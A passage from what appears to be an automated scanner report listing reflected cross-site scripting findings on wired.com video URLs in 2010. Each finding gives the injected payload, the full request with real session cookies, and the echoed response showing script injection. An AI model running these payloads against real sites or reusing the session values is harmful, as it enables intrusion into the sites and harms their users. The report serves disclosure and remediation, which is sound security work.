Connection: close
Connection: Transfer-Encoding
Content-Length: 106747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672347081001","featured","into-the-unknown","17165001897f37b"-alert(1)-"7139282558d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.935. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf70"-alert(1)-"798f3ba9e4a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured/1716500189/into-the-unknowncdf70"-alert(1)-"798f3ba9e4a/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:55:00 GMT
Date: Mon, 22 Nov 2010 00:50:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672347081001","into-the-unknowncdf70"-alert(1)-"798f3ba9e4a","featured","1716500189","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.936. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86432"-alert(1)-"fb2fe4ecb38 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured/1716500189/into-the-unknown/67234708100186432"-alert(1)-"fb2fe4ecb38 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:55:14 GMT
Date: Mon, 22 Nov 2010 00:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","67234708100186432"-alert(1)-"fb2fe4ecb38","featured","into-the-unknown","1716500189","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.937. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efd7"><a>8d6e56f6bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video4efd7"><a>8d6e56f6bcf/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29429
Vary: Accept-Encoding
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:49:45 GMT
Date: Mon, 22 Nov 2010 00:44:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video4efd7"><a>8d6e56f6bcf ss_latest-videos c_highlights">
...[SNIP]...

1.938. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f2def--><script>alert(1)</script>89c0318b3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videof2def--><script>alert(1)</script>89c0318b3b3/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29464
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:38 GMT
Date: Mon, 22 Nov 2010 00:45:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videof2def--><script>alert(1)</script>89c0318b3b3/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001
-->
...[SNIP]...

1.939. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a817"-alert(1)-"9fa2c73f7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos4a817"-alert(1)-"9fa2c73f7d7/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:33 GMT
Date: Mon, 22 Nov 2010 00:46:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "676257685001","battle-los-angeles-trailer","1716440574","highlights","latest-videos4a817"-alert(1)-"9fa2c73f7d7","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.940. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f243"><a>9ea1ab9c052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos6f243"><a>9ea1ab9c052/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:40 GMT
Date: Mon, 22 Nov 2010 00:45:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos6f243"><a>9ea1ab9c052 c_highlights">
...[SNIP]...

1.941. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d2a5"-alert(1)-"4c88b33dbf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights5d2a5"-alert(1)-"4c88b33dbf4/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:43 GMT
Date: Mon, 22 Nov 2010 00:47:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "highlights5d2a5"-alert(1)-"4c88b33dbf4","latest-videos","676257685001","battle-los-angeles-trailer","1716440574","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.942. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca37f"><a>75458ce8857 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlightsca37f"><a>75458ce8857/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:51:26 GMT
Date: Mon, 22 Nov 2010 00:46:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlightsca37f"><a>75458ce8857">
...[SNIP]...

1.943. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be1e"-alert(1)-"aa092f4bf91 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/17164405745be1e"-alert(1)-"aa092f4bf91/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:57 GMT
Date: Mon, 22 Nov 2010 00:47:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","17164405745be1e"-alert(1)-"aa092f4bf91","676257685001","battle-los-angeles-trailer","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.944. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a75"-alert(1)-"b39049b1da7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer33a75"-alert(1)-"b39049b1da7/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:52:43 GMT
Date: Mon, 22 Nov 2010 00:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "battle-los-angeles-trailer33a75"-alert(1)-"b39049b1da7","latest-videos","676257685001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.945. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cf06"-alert(1)-"a6eea67ae2b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/6762576850012cf06"-alert(1)-"a6eea67ae2b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:53:16 GMT
Date: Mon, 22 Nov 2010 00:48:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","6762576850012cf06"-alert(1)-"a6eea67ae2b","battle-los-angeles-trailer","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.946. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5727"><a>51ba763851b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videob5727"><a>51ba763851b/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29452
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:20 GMT
Date: Mon, 22 Nov 2010 00:41:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videob5727"><a>51ba763851b ss_latest-videos c_highlights">
...[SNIP]...

1.947. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 204e8--><script>alert(1)</script>7dd883f11fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video204e8--><script>alert(1)</script>7dd883f11fe/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29487
Vary: Accept-Encoding
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:47:08 GMT
Date: Mon, 22 Nov 2010 00:42:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video204e8--><script>alert(1)</script>7dd883f11fe/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001
-->
...[SNIP]...

1.948. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f6a"><a>256869a8c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos64f6a"><a>256869a8c00/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
